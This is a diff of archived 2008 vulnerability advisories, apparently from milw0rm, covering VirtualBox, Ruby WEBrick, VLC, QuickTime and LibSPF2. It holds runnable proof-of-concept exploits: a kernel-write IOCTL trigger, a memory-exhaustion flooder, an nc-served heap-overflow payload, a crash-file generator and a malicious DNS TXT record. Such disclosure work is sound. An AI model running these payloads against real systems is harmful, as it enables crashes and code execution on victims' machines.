+ +*Technical Description / Proof of Concept Code* + + +When the VirtualBox package is installed on a host the 'VBoxDrv.sys' +driver is loaded on the machine. This driver allows any unprivileged +user to open the device '\\.\VBoxDrv' and issue IOCTLs with a buffering + +mode of METHOD_NEITHER without any kind of validation. This allows +untrusted user mode code to pass arbitrary kernel addresses as arguments +to the driver. + +With specially constructed input, a malicious user can use functionality + +within the driver to patch kernel addresses and execute arbitrary code +in kernel mode. When handling IOCTLs a communication method must be +pre-defined between the user-mode application and the driver module. The + +selected method will determine how the I/O Manager manipulates memory +buffers used in the communication. + +The 'METHOD_NEITHER' is a very dangerous method because the pointer +passed to 'DeviceIoControl' as input or output buffer will be sent + +directly to the driver, thus transferring it the responsibility of doing +the proper checks to validate the addresses sent from user mode. + +The 'VBoxDrv.sys' driver uses the 'METHOD_NEITHER' communication method + +when handling IOCTLs request and does not validate properly the buffer +sent in the Irp object allowing an attacker to write to any memory +address in the kernel-mode. + +Let's see the bug on the source. This is the function used to handle the + +IOCTL requests at 'SUPDrv-win.cpp'. + +/----------- + + NTSTATUS _stdcall VBoxDrvNtDeviceControl(PDEVICE_OBJECT pDevObj, PIRP +pIrp) + { + PSUPDRVDEVEXT pDevExt = (PSUPDRVDEVEXT)pDevObj->DeviceExtension; + + PIO_STACK_LOCATION pStack = IoGetCurrentIrpStackLocation(pIrp); + PSUPDRVSESSION pSession = +(PSUPDRVSESSION)pStack->FileObject->FsContext; + + /* + * Deal with the two high-speed IOCtl that takes it's arguments from + + * the session and iCmd, and only returns a VBox status code. + */ + ULONG ulCmd = pStack->Parameters.DeviceIoControl.IoControlCode; + if ( ulCmd == SUP_IOCTL_FAST_DO_RAW_RUN +(1) || ulCmd == SUP_IOCTL_FAST_DO_HWACC_RUN + + || ulCmd == SUP_IOCTL_FAST_DO_NOP) + { + KIRQL oldIrql; + int rc; + + /* Raise the IRQL to DISPATCH_LEVEl to prevent Windows from +rescheduling us to another CPU/core. */ + Assert(KeGetCurrentIrql() <= DISPATCH_LEVEL); + + KeRaiseIrql(DISPATCH_LEVEL, &oldIrql); +(2) rc = supdrvIOCtlFast(ulCmd, pDevExt, pSession); + KeLowerIrql(oldIrql); + + /* Complete the I/O request. */ + NTSTATUS rcNt = pIrp->IoStatus.Status = STATUS_SUCCESS; + + pIrp->IoStatus.Information = sizeof(rc); + __try + { +(3) *(int *)pIrp->UserBuffer = rc; + } + __except(EXCEPTION_EXECUTE_HANDLER) + { + rcNt = pIrp->IoStatus.Status = GetExceptionCode(); + + dprintf(("VBoxSupDrvDeviceContorl: Exception Code %#x\n", rcNt)); + } + IoCompleteRequest(pIrp, IO_NO_INCREMENT); + return rcNt; + } + + return VBoxDrvNtDeviceControlSlow(pDevExt, pSession, pIrp, pStack); + + } + +- -----------/ + +At (1), we can see the sentence checking the IOCTL code. The constants +use are defined at 'SUPDrvIOC.h' in this way: + +/----------- + +#define SUP_IOCTL_FAST_DO_RAW_RUN SUP_CTL_CODE_FAST(64) + +/** Fast path IOCtl: VMMR0_DO_HWACC_RUN */ +#define SUP_IOCTL_FAST_DO_HWACC_RUN SUP_CTL_CODE_FAST(65) +/** Just a NOP call for profiling the latency of a fast ioctl call to +VMMR0. */ +#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66) + + +- -----------/ + +With the macro 'SUP_CTL_CODE_FAST()' defined in the same file: + +/----------- + +#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, +(Function) + | SUP_IOCTL_FLAG, METHOD_NEITHER, + + FILE_WRITE_ACCESS) + +- -----------/ + +Now we know that the communication method used will be 'METHOD_NEITHER ' +(this could also be easily seen by looking at the resulting IOCTL code + +in the disassembled binary). + +Then at (2) the value returned by 'supdrvIOCtlFast()' is saved in 'rc' +and this is where the problem starts because at (3), the value in 'rc' +is written directly to the buffer pointer sent from usermode without any + +check to validate that it is really pointing to an usermode address or +even a valid one. + +In this scenario, it is possible to feed the IOCTL with kernel addresses +to write the value returned by 'supdrvIOCtlFast()' ANY address in kernel + +space memory as many times as necessary to modify kernel code or kernel +pointers to subsequently get code execution in ring 0 context (that +means, with system privileges). + +This is the Proof of Concept I have made to trigger and show the + +vulnerability. This will generate a Blue Screen of Death (BSOD) trying +to write to an unpaged kernel mode address (0x80808080) but any other +arbitrary address could be used. + +/----------- + +// Author: Anibal Sacco (aLS) + +// Contact: anibal.sacco@coresecurity.com +// anibal.sacco@gmail.com +// Organization: Core Security Technologies + + +#include +#include + +int main(int argc, char **argv) +{ + HANDLE hDevice; + DWORD cb; + char szDevice[] = "\\\\.\\VBoxDrv"; + + if ( (hDevice = CreateFileA(szDevice, + + GENERIC_READ|GENERIC_WRITE, + 0, + 0, + OPEN_EXISTING, + 0, + NULL) ) != INVALID_HANDLE_VALUE ) + + { + printf("Device %s succesfully opened!\n", szDevice); + } + else + { + printf("Error: Error opening device %s\n",szDevice); + } + + cb = 0; + if (!DeviceIoControl(hDevice, + + 0x228103, + (LPVOID)0x80808080,0, + (LPVOID)0x80808080,0x0, + &cb, + NULL)) + { + printf("Error in DeviceIo ... bytes returned %#x\n",cb); + } +} + + +- -----------/ + + +*Report Timeline* + +. 2008-07-16: Core Security Technologies notifies the VirtualBox team of +the vulnerability. +. 2008-07-17: Vendor acknowledges notification. +. 2008-07-29: Core asks the vendor for a status update in the fixing + +process. +. 2008-07-30: Vendor notifies a patched version will be publicly +available on Monday 4th, August. +. 2008-07-31: Core asks the vendor to provide URL to their alert and to +confirm which versions are vulnerable and which version will include the + +fix. +. 2008-07-31: CVE ID request sent to Mitre. +. 2008-07-31: Bugtraq ID request sent to SecurityFocus.com. +. 2008-07-31: CVE ID received from Mitre. +. 2008-07-31: Bugtraq ID received SecurityFocus.com. +. 2008-08-01: Vendor provides draft version of Sun Alert and URL to + +reference it. +. 2008-08-01: Core updates its security advisory with information about +vulnerable and non-vulnerable packages. Core provides its URL to the +vendor and indicates that the vendor cataloged the issue as a Denial of + +Service bug but it should be considered a privilege escalation problem +since it allows unprivileged users to execute code in the kernel context. +. 2008-08-04: Vendor confirms that this issue can lead to arbitrary code + +execution by an unprivileged user. +. 2008-08-04: CORE-2008-0716 advisory is published. + + +*References* + +[1] Sun Welcomes Innotek - http://www.sun.com/software/innotek/. + +[2] http://www.sun.com/aboutsun/pr/2008-05/sunflash.20080529.1.xml. + + +*About CoreLabs* + +CoreLabs, the research center of Core Security Technologies, is charged + +with anticipating the future needs and requirements for information +security technologies. We conduct our research in several important +areas of computer security including system vulnerabilities, cyber +attack planning and simulation, source code auditing, and cryptography. + +Our results include problem formalization, identification of +vulnerabilities, novel solutions and prototypes for new technologies. +CoreLabs regularly publishes security advisories, technical papers, +project information and shared software tools for public use at: + +http://www.coresecurity.com/corelabs/. + + +*About Core Security Technologies* + +Core Security Technologies develops strategic solutions that help +security-conscious organizations worldwide develop and maintain a + +proactive process for securing their networks. The company's flagship +product, CORE IMPACT, is the most comprehensive product for performing +enterprise security assurance testing. CORE IMPACT evaluates network, + +endpoint and end-user vulnerabilities and identifies what resources are +exposed. It enables organizations to determine if current security +investments are detecting and preventing attacks. Core Security +Technologies augments its leading technology solution with world-class + +security consulting services, including penetration testing and software +security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core +Security Technologies can be reached at 617-399-6980 or on the Web at + +http://www.coresecurity.com. + + +*Disclaimer* + +The contents of this advisory are copyright (c) 2008 Core Security +Technologies and (c) 2008 CoreLabs, and may be distributed freely + +provided that no fee is charged for this distribution and proper credit +is given. + + +*GPG/PGP Keys* + +This advisory has been signed with the GPG key of Core Security +Technologies advisories team, which is available for download at + +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. + +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.7 (MingW32) + +Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org + +iD8DBQFIl2jIyNibggitWa0RAtj0AJ9HSRe3Hq+SCqU0RfU2LwaxINL1NwCdH5p+ +md6p6ZKbhrc7SfaD6EsxjoA= +=kQyV +-----END PGP SIGNATURE----- + +# milw0rm.com [2008-08-10] diff --git a/platforms/multiple/dos/6239.txt b/platforms/multiple/dos/6239.txt index 99af7d614..6cd337946 100755 --- a/platforms/multiple/dos/6239.txt +++ b/platforms/multiple/dos/6239.txt @@ -1,88 +1,88 @@ -------------------------------------------------------- -Language : Ruby - -Web Site: www.ruby-lang.org - -Platform: All - -Bug: Remote Socket Memory Leak - -Products Affected: -1.8 series: -- 1.8.5 and all prior versions -- 1.8.6-p286 and all prior versions -- 1.8.7-p71 and all prior versions - -1.9 series -- r18423 and all prior revisions - -Confirmed by the vendor: Yes - -Patch available : Yes -------------------------------------------------------- - -1) Introduction -2) Bug -3) Proof of concept -4) Credits - -=============== -1) Introduction -=============== -"A dynamic, open source programming language with a focus on simplicity and productivity. -It has an elegant syntax that is natural to read and easy to write." - -======= -2) Bug -======= -Ruby fails to handle properly the memory allocated for a socket -So when you send ~ 4 big request to a ruby socket, ruby will go -in infinite loop, and then crash. -The bug reside in the regex engine (in regex.c). - -================== -3)Proof of concept -=================== -This poc is an exemple for Webrick web server -crap.pl : - -#!/usr/bin/perl -use LWP::Simple; -my $payload = "\x41" x 49999999; -while(1) -{ -print "[+]\n"; -get "http://127.0.0.1:2500/".$payload.""; -} - -Result (Exemple on Webrick web server): - -[2008-07-11 22:39:55] INFO WEBrick 1.3.1 -[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux] -[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500 -[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory - /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line' - /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse' - /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run' - /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' - /usr/lib/ruby/1.8/webrick/server.rb:162:in `start' - /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' - /usr/lib/ruby/1.8/webrick/server.rb:95:in `start' - /usr/lib/ruby/1.8/webrick/server.rb:92:in `each' - /usr/lib/ruby/1.8/webrick/server.rb:92:in `start' - /usr/lib/ruby/1.8/webrick/server.rb:23:in `start' - /usr/lib/ruby/1.8/webrick/server.rb:82:in `start' - /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch' - script/server:62 -[FATAL] failed to allocate memory -root@audit:/home/audit# - -===== -5)Credits -===== - -laurent gaffié - -laurent.gaffie{remove_this}[at]gmail[dot]com - -# milw0rm.com [2008-08-13] +------------------------------------------------------- +Language : Ruby + +Web Site: www.ruby-lang.org + +Platform: All + +Bug: Remote Socket Memory Leak + +Products Affected: +1.8 series: +- 1.8.5 and all prior versions +- 1.8.6-p286 and all prior versions +- 1.8.7-p71 and all prior versions + +1.9 series +- r18423 and all prior revisions + +Confirmed by the vendor: Yes + +Patch available : Yes +------------------------------------------------------- + +1) Introduction +2) Bug +3) Proof of concept +4) Credits + +=============== +1) Introduction +=============== +"A dynamic, open source programming language with a focus on simplicity and productivity. +It has an elegant syntax that is natural to read and easy to write." + +======= +2) Bug +======= +Ruby fails to handle properly the memory allocated for a socket +So when you send ~ 4 big request to a ruby socket, ruby will go +in infinite loop, and then crash. +The bug reside in the regex engine (in regex.c). + +================== +3)Proof of concept +=================== +This poc is an exemple for Webrick web server +crap.pl : + +#!/usr/bin/perl +use LWP::Simple; +my $payload = "\x41" x 49999999; +while(1) +{ +print "[+]\n"; +get "http://127.0.0.1:2500/".$payload.""; +} + +Result (Exemple on Webrick web server): + +[2008-07-11 22:39:55] INFO WEBrick 1.3.1 +[2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux] +[2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500 +[2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory + /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line' + /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse' + /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run' + /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' + /usr/lib/ruby/1.8/webrick/server.rb:162:in `start' + /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' + /usr/lib/ruby/1.8/webrick/server.rb:95:in `start' + /usr/lib/ruby/1.8/webrick/server.rb:92:in `each' + /usr/lib/ruby/1.8/webrick/server.rb:92:in `start' + /usr/lib/ruby/1.8/webrick/server.rb:23:in `start' + /usr/lib/ruby/1.8/webrick/server.rb:82:in `start' + /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch' + script/server:62 +[FATAL] failed to allocate memory +root@audit:/home/audit# + +===== +5)Credits +===== + +laurent gaffié + +laurent.gaffie{remove_this}[at]gmail[dot]com + +# milw0rm.com [2008-08-13] diff --git a/platforms/multiple/dos/6293.txt b/platforms/multiple/dos/6293.txt index 70eb6f406..cd53648e6 100755 --- a/platforms/multiple/dos/6293.txt +++ b/platforms/multiple/dos/6293.txt @@ -1,113 +1,113 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - -- - Orange Bat advisory - - -Name : VLC 0.8.6i MMS Protocol Handling -Class : Heap Overflow -Published : 2008-08-24 -Credit : g_ (g_ # orange-bat # com) - -- - Details - - -This can be exploited from remote. User have to open mmst:// -link poiting to server controlled by the attacker. - -vlc\modules\access\mms\mmstu.c : - -static int mms_ReceiveCommand( access_t *p_access ) -{ - access_sys_t *p_sys = p_access->p_sys; - - for( ;; ) - { - int i_used; - int i_status; - - if( NetFillBuffer( p_access ) < 0 ) - { - msg_Warn( p_access, "cannot fill buffer" ); - return VLC_EGENERIC; - } - if( p_sys->i_buffer_tcp > 0 ) - { -[1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp, - p_sys->i_buffer_tcp, &i_used ); -[2] if( i_used < MMS_BUFFER_SIZE ) - { -[3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used, - MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow - -(...) - -[1] - function that sets i_used to negative value, see below -[2] - i_used is signed, so predicate is true -[3] - actual overflow, we have good control over what is written - -static int mms_ParseCommand( access_t *p_access, - uint8_t *p_data, - int i_data, - int *pi_used ) -(...) - i_length = GetDWLE( p_data + 8 ) + 16; -(...) - if( i_length > p_sys->i_cmd ) - { - msg_Warn( p_access, - "truncated command (missing %d bytes)", - i_length - i_data ); - p_sys->i_command = 0; - return -1; - } -[1] else if( i_length < p_sys->i_cmd ) - { - p_sys->i_cmd = i_length; -[2] *pi_used = i_length; - } - -(...) - -[1] - predicate is true -[2] - sets i_used from mms_ReceiveCommand - -- - Proof of concept - - -on localhost: - -perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot -nc -l -v -p 1755 < headshot - -open this url in VLC: - -mmst://127.0.0.1/ - -boom! headshot :) - -- - PGP - - -All advisories from Orange Bat are signed. You can find our public -key here: http://www.orange-bat.com/g_.asc - -- - Disclaimer - - -This document and all the information it contains is provided "as is", -without any warranty. Orange Bat is not responsible for the -misuse of the information provided in this advisory. The advisory is -provided for educational purposes only. - -Permission is hereby granted to redistribute this advisory, providing -that no changes are made and that the copyright notices and -disclaimers remain intact. - -(c) 2008 www.orange-bat.com - - ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70 - -iEYEARECAAYFAkiwgBkACgkQIUHRVUfOLgUKOgCdFOAznbm44YJWiEqaQJK7XaF2 -AuIAnRjabi6RiPT6G/66kxseVG+K0rkj -=/CN5 ------END PGP SIGNATURE----- - -# milw0rm.com [2008-08-23] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +- - Orange Bat advisory - + +Name : VLC 0.8.6i MMS Protocol Handling +Class : Heap Overflow +Published : 2008-08-24 +Credit : g_ (g_ # orange-bat # com) + +- - Details - + +This can be exploited from remote. User have to open mmst:// +link poiting to server controlled by the attacker. + +vlc\modules\access\mms\mmstu.c : + +static int mms_ReceiveCommand( access_t *p_access ) +{ + access_sys_t *p_sys = p_access->p_sys; + + for( ;; ) + { + int i_used; + int i_status; + + if( NetFillBuffer( p_access ) < 0 ) + { + msg_Warn( p_access, "cannot fill buffer" ); + return VLC_EGENERIC; + } + if( p_sys->i_buffer_tcp > 0 ) + { +[1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp, + p_sys->i_buffer_tcp, &i_used ); +[2] if( i_used < MMS_BUFFER_SIZE ) + { +[3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used, + MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow + +(...) + +[1] - function that sets i_used to negative value, see below +[2] - i_used is signed, so predicate is true +[3] - actual overflow, we have good control over what is written + +static int mms_ParseCommand( access_t *p_access, + uint8_t *p_data, + int i_data, + int *pi_used ) +(...) + i_length = GetDWLE( p_data + 8 ) + 16; +(...) + if( i_length > p_sys->i_cmd ) + { + msg_Warn( p_access, + "truncated command (missing %d bytes)", + i_length - i_data ); + p_sys->i_command = 0; + return -1; + } +[1] else if( i_length < p_sys->i_cmd ) + { + p_sys->i_cmd = i_length; +[2] *pi_used = i_length; + } + +(...) + +[1] - predicate is true +[2] - sets i_used from mms_ReceiveCommand + +- - Proof of concept - + +on localhost: + +perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot +nc -l -v -p 1755 < headshot + +open this url in VLC: + +mmst://127.0.0.1/ + +boom! headshot :) + +- - PGP - + +All advisories from Orange Bat are signed. You can find our public +key here: http://www.orange-bat.com/g_.asc + +- - Disclaimer - + +This document and all the information it contains is provided "as is", +without any warranty. Orange Bat is not responsible for the +misuse of the information provided in this advisory. The advisory is +provided for educational purposes only. + +Permission is hereby granted to redistribute this advisory, providing +that no changes are made and that the copyright notices and +disclaimers remain intact. + +(c) 2008 www.orange-bat.com + + +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70 + +iEYEARECAAYFAkiwgBkACgkQIUHRVUfOLgUKOgCdFOAznbm44YJWiEqaQJK7XaF2 +AuIAnRjabi6RiPT6G/66kxseVG+K0rkj +=/CN5 +-----END PGP SIGNATURE----- + +# milw0rm.com [2008-08-23] diff --git a/platforms/multiple/dos/6471.pl b/platforms/multiple/dos/6471.pl index 0df43a36b..6bf59fcf4 100755 --- a/platforms/multiple/dos/6471.pl +++ b/platforms/multiple/dos/6471.pl @@ -1,38 +1,38 @@ -############################################################################### -# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash -# Vendor: http://www.apple.com/ -# Risk : high -# -# The "" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player. -# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding -# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a -# remote crash on firefox, IE and any browser using the Quicktime plugin. -# Code execution may be possible. -my $payload = -"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f". -"\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d". -"\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b". -"\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". -"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e". -"\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f". -"\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d". -"\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76". -"\x65\x72\x22\x20\x2f\x3e\x00"; - -my $file="crash.mov"; -open(my $file, ">>$file") or die "Cannot open $file: $!"; -print $file $payload; -close($file); - -# milw0rm.com [2008-09-16] +############################################################################### +# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash +# Vendor: http://www.apple.com/ +# Risk : high +# +# The "" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player. +# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding +# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a +# remote crash on firefox, IE and any browser using the Quicktime plugin. +# Code execution may be possible. +my $payload = +"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f". +"\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d". +"\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b". +"\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e". +"\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f". +"\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d". +"\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76". +"\x65\x72\x22\x20\x2f\x3e\x00"; + +my $file="crash.mov"; +open(my $file, ">>$file") or die "Cannot open $file: $!"; +print $file $payload; +close($file); + +# milw0rm.com [2008-09-16] diff --git a/platforms/multiple/dos/6805.txt b/platforms/multiple/dos/6805.txt index bcef4afc3..4ed596903 100755 --- a/platforms/multiple/dos/6805.txt +++ b/platforms/multiple/dos/6805.txt @@ -1,256 +1,256 @@ -Advisory: DNS TXT Record Parsing Bug in LibSPF2 -Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc, -Dan.Kaminsky@ioactive.com (PGP Key In Appendix) -Abstract: - -A relatively common bug parsing TXT records delivered over DNS, dating -at least back to 2002 in Sendmail 8.2.0 and almost certainly much -earlier, has been found in LibSPF2, a library frequently used to -retrieve SPF (Sender Policy Framework) records and apply policy -according to those records. This implementation flaw allows for -relatively flexible memory corruption, and should thus be treated as a -path to anonymous remote code execution. Of particular note is that the -remote code execution would occur on servers specifically designed to -receive E-Mail from the Internet, and that these systems may in fact be -high volume mail exchangers. This creates privacy implications. It is -also the case that a corrupted email server is a useful “jumping off” -point for attackers to corrupt desktop machines, since attachments can -be corrupted with malware while the containing message stays intact. So -there are internal security implications as well, above and beyond -corruption of the mail server on the DMZ. - -Recommendations: - -If you are a major mail exchange, you should determine whether the SPAM -filters that protect your systems use LibSPF2. - -If you are a vendor of anti-SPAM devices, or the author of an operating -system with components that may use LibSPF2, you should determine -whether LibSPF2 is used in any of your configurations and migrate to -LibSPF 1.2.8, found at: - - http://www.libspf2.org/index.html - -If your product has a dependency on DNS TXT records, we recommend you -test it for the parsing bug that LibSPF2 was vulnerable to, since this -has been a problem for some time. Name server implementations may want -to consider adding filtering themselves, though record validation is not -normally their job. - -Details: DNS TXT records have long been a little tricky to parse, due -to them containing two length fields. First, there is the length field -of the record as a whole. Then, there is a sublength field, from 0 to -255, that describes the length of a particular character string inside -the larger record. There is nothing that links the two values, and DNS -servers to not themselves enforce sanity checks here. As such, there is -always a risk that when receiving a DNS TXT record, the outer record -length will be the amount allocated, but the inner length will be copied. - -In the past, we’ve seen this particular bug all over the place, -including in Sendmail. This is just the same bug, showing up in LibSPF2 -1.2.5: - -Spf_dns_resolv.c#SPF_dns_resolv_lookup(): - - case ns_t_txt: - if ( rdlen > 1 ) - { - u_char *src, *dst; - size_t len; - - if ( SPF_dns_rr_buf_realloc( spfrr, cnt, rdlen ) != -SPF_E_SUCCESS ) // allocate rdlen bytes at spf->rr[cn]->txt - return spfrr; - - dst = spfrr->rr[cnt]->txt; - len = 0; - src = (u_char *)rdata; - while ( rdlen > 0 ) - { - len = *src; // get a second length from the attacker -controlled datastream -- some value from 0 to 255, unbound to rdlen - src++; - memcpy( dst, src, len ); // copy that second length to -rdlen byte buffer. - dst += len; - src += len; - rdlen -= len + 1; - } - *dst = '\0'; - - For validation purposes, a build of LibSPF2 was instrumented, to -validate the heap overflow: - -$ ./spfquery -ip=1.2.3.4 -sender=foo@bar.toorrr.com -buffer 8107080 has size 16 -buffer 8107090 has size 16 -buffer 81070a0 has size 16 -writing 255 bytes to a 15 size buffer at 81070a0 // overflow -buffer 8123030 has size 234 -writing 233 bytes to a 234 size buffer at 8123030 -buffer 81060c0 has size 20 -buffer 81060e0 has size 20 -buffer 8123120 has size 234 -buffer 8106100 has size 31 -StartError -Context: Failed to query MAIL-FROM -ErrorCode: (2) Could not find a valid SPF record -Error: Invalid character in middle of mechanism near 'À - bar.toorrr' -Error: Failed to compile SPF record for 'bar.toorrr.com' -EndError -(invalid) - -The actual record used to spawn this behavior was as follows: - -;; HEADER SECTION -;; id = 63838 -;; qr = 1 opcode = QUERY aa = 1 tc = 0 rd = 1 -;; ra = 0 ad = 0 cd = 0 rcode = NOERROR -;; qdcount = 1 ancount = 2 nscount = 0 arcount = 0 - -;; QUESTION SECTION (1 record) -;; bar.toorrr.com. IN TXT - -;; ANSWER SECTION (2 records) -bar.toorrr.com. 0 IN TXT "v=spf1 mx +all" -bar.toorrr.com. 0 IN TXT -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - -;; AUTHORITY SECTION (0 records) - -;; ADDITIONAL SECTION (0 records) - -Or, in hex: - - 00 01 02 03 04 05 06 07 - 08 09 0A 0B 0C 0D 0E 0F -0123456789ABCDEF - -00000000 F9 5E 85 00 00 01 00 02 - 00 00 00 00 03 62 61 72 -.^...........bar -00000010 06 74 6F 6F 72 72 72 03 - 63 6F 6D 00 00 10 00 01 